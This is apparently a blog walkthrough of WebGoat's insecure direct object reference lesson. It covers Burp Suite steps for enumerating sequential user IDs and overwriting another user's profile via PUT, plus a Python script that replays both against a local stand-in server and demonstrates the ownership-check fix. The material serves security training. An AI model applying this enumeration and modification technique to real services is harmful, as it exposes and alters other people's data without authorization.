WebGoat (A5) Broken Access Control - Insecure Direct Object References

Table of Contents

1. Quick walkthrough

Page 2

Page 3

Page 4

Page 5

2. Does the course still need a mind map?


1. Quick walkthrough

Judging by the title, I expected something hard to predict, but it turned out to be... a plain broken-authorization bug: the server hands out whatever object the URL names without checking that it belongs to the logged-in user.

Page 2

This page only requires logging in with the user name tom and the password cat; the later pages use that session.

Page 3

This page asks you to find the attributes in the response that are not displayed on the web page.

Click View Profile, capture the response in Burp Suite, and compare what the page renders with what the server actually returned; the fields present in the response but absent from the page are the answer. Over-fetching like this matters because a client-side view is not a security boundary: anything the server sends is visible to whoever holds the session.

Page 4

This page asks for the direct object reference used to view your own profile.

From the Burp Suite capture in the previous step, the profile path is /WebGoat/IDOR/profile and Tom's userId is 2342384.

I tried both WebGoat/IDOR/profile?userId=2342384 and WebGoat/IDOR/profile/2342384; the accepted answer is:

WebGoat/IDOR/profile/2342384

Page 5

There are two tasks on this page:

(1) View another user's profile

(2) Modify another user's profile (Buffalo Bill's)

Start with the first task, viewing other users' profiles:

Click the first View Profile button in the figure above, capture the request in Burp Suite, find the message shown in the figure below, and send it to Intruder.

In Intruder, mark the highlighted part of the request (the userId at the end of the path) as the payload position and choose the Sniper attack type.

Set the payload as shown in the figure below, with the payload type Numbers.

Since Tom's own userId is 2342384, another user's ID is probably not far away, so start with a small range: 2342370 to 2342400 with a step of 1, as in the figure below. This is the whole point of the lesson: the identifiers are sequential and the server never checks that the requested profile belongs to the logged-in session, so a short numeric sweep is enough to walk through other users' data.

The result is shown in the figure below. After sorting by Length, the one response that differs from the rest stands out; that is Buffalo Bill's profile.

Now the second task:

Send the corresponding request from the figure above to Repeater.

Then modify three things, as in the figure below:

(1) Change the request method from GET to PUT

(2) Set Content-Type to application/json

(3) In the request body, build Buffalo Bill's profile as JSON. Per the lesson's requirements, set role to a number smaller than 3 and color to red.

The server accepts the PUT for a userId other than Tom's exactly as it accepted the GET: the same missing ownership check that leaked the profile now allows it to be overwritten. The fix on the server side is the same for both verbs: resolve the caller from the session, then reject any request whose object does not belong to that caller (or to a role explicitly allowed to manage it), instead of trusting the id in the URL.
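As an added example (not code from the original write-up or from WebGoat itself), the script below replays both tasks offline against a small stand-in for the /WebGoat/IDOR/profile endpoint: a GET sweep over the same 2342370 to 2342400 range with results sorted by response length, then the PUT with Content-Type application/json, role below 3 and color red. The stand-in server, the session cookie, Buffalo Bill's userId 2342388 and every profile field other than Tom's userId 2342384 are assumptions made for the demo, not values from the page. Running `make_handler(enforce_owner=True)` adds the ownership check whose absence is the IDOR, so the same sweep and PUT can be seen failing against the fixed version.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed user table: 2342384 is Tom's userId from the page; everything else,
# including Buffalo Bill's userId 2342388, is an assumption made for this demo.
USERS = {
    2342384: {"userId": "2342384", "name": "Tom Cat", "role": 3, "color": "yellow", "size": "small"},
    2342388: {"userId": "2342388", "name": "Buffalo Bill", "role": 3, "color": "brown", "size": "large"},
}
SESSIONS = {"JSESSIONID=tom-session": 2342384}  # cookie -> logged-in userId (assumed)
PREFIX = "/WebGoat/IDOR/profile/"


def make_handler(enforce_owner):
    """False reproduces the lesson's bug (any session reads/writes any userId); True adds the missing check."""

    class Handler(BaseHTTPRequestHandler):
        def log_message(self, *_):
            pass  # silence per-request logging

        def _reply(self, code, body):
            data = json.dumps(body).encode()
            self.send_response(code)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def _check(self):
            # Returns the target userId, or None after sending an error response.
            tail = self.path[len(PREFIX):] if self.path.startswith(PREFIX) else ""
            target = int(tail) if tail.isdigit() else None
            caller = SESSIONS.get(self.headers.get("Cookie", ""))
            if target not in USERS:
                self._reply(404, {"error": "not found"})
            elif caller is None or (enforce_owner and caller != target):
                self._reply(403, {"error": "forbidden"})  # the fix: the object must belong to the caller
            else:
                return target
            return None

        def do_GET(self):
            target = self._check()
            if target is not None:
                self._reply(200, USERS[target])

        def do_PUT(self):
            target = self._check()
            if target is not None:
                update = json.loads(self.rfile.read(int(self.headers.get("Content-Length", 0))))
                USERS[target].update({k: update[k] for k in ("role", "color", "size", "name") if k in update})
                self._reply(200, USERS[target])

    return Handler


def fetch(url, cookie, method="GET", body=None):
    """One request as the given session; error statuses are returned, not raised."""
    data = json.dumps(body).encode() if body is not None else None
    # Step (2) of task two: Content-Type application/json (harmless on the GETs as well).
    req = Request(url, data=data, method=method, headers={"Cookie": cookie, "Content-Type": "application/json"})
    try:
        with urlopen(req) as resp:
            return resp.status, resp.read()
    except HTTPError as err:
        return err.code, err.read()


def enumerate_profiles(base, cookie, ids):
    """Task 1, the Intruder sniper/Numbers sweep: request every userId in the range,
    keep the 200s and sort by body length as the write-up does."""
    hits = []
    for uid in ids:
        status, body = fetch(f"{base}{PREFIX}{uid}", cookie)
        if status == 200:
            hits.append((uid, len(body), json.loads(body)["name"]))
    return sorted(hits, key=lambda h: h[1])


def modify_profile(base, cookie, uid, role, color):
    """Task 2, the Repeater edit: same URL, GET -> PUT, JSON body, role < 3, color red."""
    status, body = fetch(f"{base}{PREFIX}{uid}", cookie, "PUT", {"role": role, "color": color})
    return status, json.loads(body)


def run_demo(enforce_owner):
    """Run both tasks as Tom against the stand-in server and return what happened."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), make_handler(enforce_owner))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base, cookie = f"http://127.0.0.1:{server.server_address[1]}", "JSESSIONID=tom-session"
    try:
        found = enumerate_profiles(base, cookie, range(2342370, 2342401))
        others = [uid for uid, _, _ in found if uid != 2342384]
        status, profile = modify_profile(base, cookie, others[0], 1, "red") if others else (None, None)
        return {"found": found, "others": others, "put_status": status, "profile": profile}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("vulnerable:", run_demo(enforce_owner=False))
    print("fixed:     ", run_demo(enforce_owner=True))
```

Against the vulnerable handler the sweep returns two 200s, the longer body being Buffalo Bill's, and the PUT to his id succeeds with role 1 and color red. With `enforce_owner=True` the only 200 is Tom's own profile and there is nothing left to modify; the sweep still tells an attacker which ids exist (403 versus 404), which is why real deployments often return the same status for both cases.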

2. Does the course still need a mind map?

Source: blog.csdn.net/elephantxiang/article/details/114855007